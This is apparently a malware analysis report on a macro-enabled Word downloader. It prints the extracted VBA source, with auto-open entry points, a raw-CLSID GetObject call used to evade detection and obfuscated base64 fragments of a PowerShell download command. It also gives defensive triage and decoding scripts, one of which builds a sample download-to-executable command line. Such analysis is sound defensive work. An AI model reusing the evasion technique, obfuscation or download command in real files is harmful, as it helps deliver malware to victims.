Malware Insights
The sample is an OOXML Word document (word/vbaProject.bin) carrying a VBA project with four auto-execution entry points: AutoOpen, Document_Open, Auto_Open and Workbook_Open. All four call one private routine, helloWord, which instantiates a COM class by raw CLSID through the "new:" moniker, GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"), instead of by ProgID with CreateObject. That CLSID is registered as ShellBrowserWindow; its Document.Application property returns the Shell object, whose ShellExecute method launches programs, so the moniker form is a known way to reach command execution or a payload download while evading name-based macro detection. In the extracted source, however, no method is ever called on the object, the variable assembled from "h" & "e" & "l" & "l" is never used, and the four String functions (favourite, examination, cat, secretary) that return long blob fragments are never referenced. Those fragments are base64 of UTF-16LE text with every 'A' written as '9' and spaces inserted: stripping the spaces and reversing the substitution on the first fragment yields "Invoke-WebRequest", the PowerShell download cmdlet. Together with the p-code finding below (shell/download tokens in the compiled stream), this supports classing the document as a downloader or initial-execution stage; because the visible source alone performs no download, compare the p-code with the extracted source (for example with pcodedmp) before treating the listing below as the complete macro.
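The triage the heuristics on this page perform over the macro can be reproduced on extracted VBA source. The Python below is an added example, not code from the report's analyzer or from oletools; it runs over a constructed excerpt modelled on the listing further down (reindented, and only some of the procedures), the AUTOEXEC name set is a partial list of Office auto-execution procedure names, and the CLSID-to-class mapping is an assumption maintained by hand. It reports the auto-execution entry points, every CLSID activated through the "new:" moniker, and the procedures nothing else references, which is how the unused String functions in this sample stand out.

```python
import re
from typing import Dict, List, Tuple

# Constructed excerpt modelled on the macro listed in this report (a subset of the real
# source, reindented); it is input for the triage functions below, not the sample itself.
SAMPLE_VBA = '''
Private Function favourite() As String
    favourite = "SQBu 9HY9bwBr9GU9 LQBX9GU9Y gBS9GU9c QB19G U9cwB09C99"
End Function
Private Sub helloWord()
    Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
    Dim fjiorr
    fjiorr = "h" & "e" & "l" & "l"
End Sub
Sub AutoOpen()
    helloWord
End Sub
Sub Document_Open()
    helloWord
End Sub
'''

# Partial list of Office auto-execution procedure names (lower-cased for comparison).
AUTOEXEC = {
    "autoopen", "autoexec", "autoclose", "autoexit", "autonew",
    "document_open", "document_close", "document_new",
    "auto_open", "auto_close", "workbook_open", "workbook_close", "workbook_activate",
}

# Analyst-maintained mapping (assumption: no library supplies it); only the CLSID
# seen in this report is listed.
KNOWN_CLSIDS = {
    "C08AFD90-F2A1-11D1-8455-00A0C91F3880": "ShellBrowserWindow (Document.Application.ShellExecute)",
}

PROC_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?(Sub|Function)\s+(\w+)\s*\(", re.I | re.M)
NEW_MONIKER_RE = re.compile(r'GetObject\s*\(\s*"new:\{?([0-9A-Fa-f-]{36})\}?"', re.I)


def procedures(src: str) -> Dict[str, str]:
    """Map each Sub/Function name to its text, from the header to the matching End line."""
    procs: Dict[str, str] = {}
    for m in PROC_RE.finditer(src):
        kind, name = m.group(1), m.group(2)
        end = re.compile(r"^\s*End\s+" + kind + r"\b", re.I | re.M).search(src, m.end())
        procs[name] = src[m.start(): end.end() if end else len(src)]
    return procs


def entry_points(procs: Dict[str, str]) -> List[str]:
    """Procedures Office runs on open/close without user interaction."""
    return sorted(n for n in procs if n.lower() in AUTOEXEC)


def clsid_instantiations(procs: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """(procedure, CLSID, label) for every GetObject("new:<CLSID>") activation."""
    hits = []
    for name, body in procs.items():
        for clsid in NEW_MONIKER_RE.findall(body):
            clsid = clsid.upper()
            hits.append((name, clsid, KNOWN_CLSIDS.get(clsid, "unknown CLSID")))
    return hits


def unreferenced(procs: Dict[str, str]) -> List[str]:
    """Non-entry-point procedures that no other procedure mentions (dead code in the visible source)."""
    dead = []
    for name in procs:
        if name.lower() in AUTOEXEC:
            continue
        pat = re.compile(r"\b" + re.escape(name) + r"\b", re.I)
        if not any(pat.search(body) for other, body in procs.items() if other != name):
            dead.append(name)
    return sorted(dead)


if __name__ == "__main__":
    p = procedures(SAMPLE_VBA)
    print("entry points:", entry_points(p))
    print("CLSID activations:", clsid_instantiations(p))
    print("never referenced:", unreferenced(p))
```

Procedures that nothing references are worth listing separately: in a stomped document the caller may exist only in the p-code, so "dead" source is a prompt to compare the two streams rather than a reason to dismiss the strings.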
Heuristics (11)
- ClamAV: Doc.Downloader.Generic-6698421-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0.
- VBA project inside OOXML (medium, OOXML_VBA, 7 related findings). Document contains a VBA project; VBA macros present.
- GetObject call (high, OLE_VBA_GETOBJ). Matched line, in Private Sub helloWord(): Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
- VBA instantiates a COM class by raw CLSID (high, OLE_VBA_GETOBJECT_CLSID_EVASION). VBA uses GetObject("new:{CLSID}") to instantiate a COM class by raw CLSID rather than a CreateObject ProgID, an uncommon bypass of name-based macro detection. Matched line, in Private Sub helloWord(): Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). The compiled VBA (p-code/cache) stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. Here the extracted source instantiates the COM object but calls nothing on it, so the shell/download tokens in the p-code are not accounted for by the visible source.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line: Sub AutoOpen() ' Becomes launched as first on MS Word
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line: Sub Document_Open() ' Becomes launched as second, another try, on MS Word
- Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched line: Sub Workbook_Open() ' Becomes launched as second, another try, on MS Excel
- Auto_Open macro (low, OLE_VBA_AUTO). Matched line: Sub Auto_Open() ' Becomes launched as first on MS Excel
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it. Every URL below was found in document text (OOXML body / shared strings); all are Office Open XML namespace identifiers, and none was reached from the macro:
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1811 bytes | d8c17a92dcac6f092f21e1389a5a1190190656152b2245a42233de269fed056c |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 18944 bytes | 28e42e9f63a2076eefede5de3608e3953fc13167a599c17b9b8d08e182947311 |

Preview of macros.bas (first 1,000 lines of the extracted script). Two module streams, ThisDocument and NewMacros, appear back to back:

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Public alreadyLaunched As Integer
Private Function favourite() As String
favourite = "SQBu 9HY9bwBr9GU9 LQBX9GU9Y gBS9GU9c QB19G U9cwB09C99LQBV9 FI9SQ9g9 Gg9d9B0 9H99cw969C 89LwBi9G k9d99u9Gw9eQ9 v9DM9awBL9 GI9Ug92 9HM9I99t9E89I9 BD9Do"
End Function
Private Function examination() As String
examination = "9X9 BV9HM9ZQBy9 HM9X9BH9EI9 TwBZ9EU 9UgBc9 EE9c9Bw9EQ 9YQB09GE9X9 BM9G89Yw Bh9Gw9X9 BU9GU9bQB w9Fw9 dwBl9GI9a9 Bv9HM9d9 9u9GU9e9B l9Ds9 UwB09GE 9cgB09C"
End Function
Private Function cat() As String
cat = "09U9B y9G89YwB l9HM9cw9g9 C09Rg9g9EM 9OgBc9FU 9cwBl9HI 9cwBc 9Ec9Qg BP9Fk 9RQBS9 Fw9QQBw9H9 9R9Bh 9HQ9Y QBc9Ew9bw Bj9GE9b9Bc9FQ 9ZQBt9H99 X9B39 GU9YgBo9"
End Function
Private Function secretary() As String
secretary = "G89cw B09C49ZQB 49GU9I 99t9EE9 I99n9C09Z Q9g9GM9 bQBk9C99OQ 9x9C49 MQ9y9DE9 Lg9x9Dc9Nw9u9DI 9M9909C99O99 w9Dg9M99 n9C99 LQB39Gk9I 9Bo9Ds9"
End Function
Private Sub helloWord()
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
Dim fjiorr
fjiorr = "h" & "e" & "l" & "l"
End Sub
Sub AutoOpen()
' Becomes launched as first on MS Word
helloWord
End Sub
Sub Document_Open()
' Becomes launched as second, another try, on MS Word
helloWord
End Sub
Sub Auto_Open()
' Becomes launched as first on MS Excel
helloWord
End Sub
Sub Workbook_Open()
' Becomes launched as second, another try, on MS Excel
helloWord
End Sub
```

Detection (vbaProject_00.bin):
- ClamAV: Doc.Downloader.Generic-6698421-0
- Obfuscation or payload: likely. Carved artifact contains 2 long base64-like blob(s).
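The blob fragments returned by favourite, examination, cat and secretary decode to UTF-16LE text once whitespace is stripped and every '9' is read as 'A'; the four fragments are consecutive pieces of one base64 stream, so they have to be joined before decoding or the later pieces land off the base64 grid. The Python below is an added example, not part of the report or of any tool it names. It encodes a constructed command line the same way the sample does, to show the round trip, and then applies the decoder to the first fragment copied verbatim from the listing above. The '9' for 'A' substitution is an assumption drawn from that fragment, and because '9' is itself a base64 digit the reversal is lossy wherever the original text produced one.

```python
import base64
from typing import Iterable

# First fragment, copied verbatim from favourite() in the extracted macro. The other three
# String functions return the continuation of the same base64 stream.
REPORT_BLOB_1 = (
    "SQBu 9HY9bwBr9GU9 LQBX9GU9Y gBS9GU9c QB19G U9cwB09C99LQBV9 FI9SQ9g9 Gg9d9B0 "
    "9H99cw969C 89LwBi9G k9d99u9Gw9eQ9 v9DM9awBL9 GI9Ug92 9HM9I99t9E89I9 BD9Do"
)

# Constructed plaintext for the round-trip check; it is not text recovered from the sample.
CONSTRUCTED_CMD = (
    "Invoke-WebRequest -Uri https://example.invalid/stage2 -OutFile C:\\Users\\Public\\s2.exe"
)

# Assumption drawn from the first fragment: the encoder wrote every base64 'A' as '9'.
SUBSTITUTE, ORIGINAL = "9", "A"


def encode_like_sample(text: str, chunk: int = 7) -> str:
    """Mimic the sample: UTF-16LE -> base64 -> 'A' written as '9' -> spaces inserted."""
    b64 = base64.b64encode(text.encode("utf-16-le")).decode("ascii")
    b64 = b64.replace(ORIGINAL, SUBSTITUTE)
    return " ".join(b64[i:i + chunk] for i in range(0, len(b64), chunk))


def normalize(blob: str) -> str:
    """Strip whitespace, undo the substitution and restore base64 padding.

    Lossy by construction: a genuine '9' in the original base64 (for ASCII text in
    UTF-16LE it arises only from '=' or '}' in the plaintext) becomes 'A' as well.
    """
    s = "".join(blob.split()).replace(SUBSTITUTE, ORIGINAL)
    return s + "=" * (-len(s) % 4)


def looks_like_utf16le(raw: bytes) -> bool:
    """ASCII text stored as UTF-16LE has a zero byte in every odd position."""
    odd = raw[1::2]
    return len(odd) >= 4 and odd.count(0) / len(odd) > 0.9


def decode_blob(blob: str) -> str:
    """Decode one fragment (or a joined stream) to text."""
    raw = base64.b64decode(normalize(blob))
    if looks_like_utf16le(raw):
        raw = raw[: len(raw) - len(raw) % 2]  # a fragment boundary can leave a dangling byte
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def decode_parts(parts: Iterable[str]) -> str:
    """Join fragments before decoding; each one on its own is misaligned to the base64 grid."""
    return decode_blob("".join(parts))


if __name__ == "__main__":
    print(decode_blob(REPORT_BLOB_1))
    assert decode_blob(encode_like_sample(CONSTRUCTED_CMD)) == CONSTRUCTED_CMD
```

Run as a script it prints the recovered prefix of the first fragment; pass all four fragments, in source order, to decode_parts to recover the whole command line. Any URL or path it yields is an indicator to be recorded and checked against threat intelligence, not fetched.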